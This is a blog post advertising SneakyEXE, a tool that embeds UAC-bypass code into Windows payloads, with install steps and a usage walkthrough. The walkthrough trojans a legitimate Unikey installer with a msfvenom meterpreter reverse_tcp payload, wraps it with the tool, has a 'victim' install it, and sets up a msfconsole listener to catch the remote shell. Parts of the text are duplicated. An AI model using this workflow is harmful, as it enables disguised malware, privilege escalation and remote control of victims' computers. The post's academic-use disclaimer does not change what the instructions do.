SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload
Posted
by Frames
on 7:34 PM
About SneakyEXE
SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).
SneakyEXE was tested on:
- Windows 7, 8, 10 (64 bit)
- Parrot Security OS 4.7
Requirements of SneakyEXE:
- For Linux: Architecture: Optional
Python 3.7.x: Yes
Module: termcolor
Distro: Any
Distro version: Any - For Windows: Architecture: x86_64
Python 3.7.x: No
Module: No
Windows version: 7, 8, 10
SneakyEXE's Installtion for Linux
You must install Python 3 first:
- For Debian-based distros:
sudo apt install python3
- For Arch Linux based distros:
sudo pacman -S python3
And then, open your Terminal and enter these commands:
SneakyEXE's Installtion for Windows
- Download SneakEXE-master zip file.
- Unzip it into your optional directory.
- Change dir to
\SneakyEXE\Win32\
. - Execute
sneakyexe.exe
(orsys\sneakyexe.exe
for an improved startup speed). - (Optional : you can copy
sneakyexe.exe
to whatever directory you want and delete the unzipped one)
NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.
SneakyEXE GUI verion installation for Windows
You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file and unzip it.
And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:
How to use SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
After that, to embed UAC-Bypassing codes to
And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:
and wait...
Disclaimer:
SneakyEXE GUI verion installation for Windows
You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
Download SneakEXE-master zip file and unzip it.
And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:
pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe
How to use SneakyEXE?
Example:
I dowloaded Unikey from Unikey.org.
And then, i used
msfvenom
to inject payload to UniKeyNT.exe
(payload used: windows/meterpreter/reverse_tcp
). I called the payload file is uNiKeY.exe
.After that, to embed UAC-Bypassing codes to
uNiKeY.exe
, i used this command:python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE
And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:
sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit
and wait...
Disclaimer:
- This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
- Feel free to use this project in your software, just don't reclaim the ownerhsip.
Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).
Author: Copyright © 2019 by Zenix Blurryface.
0 comments on "SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload"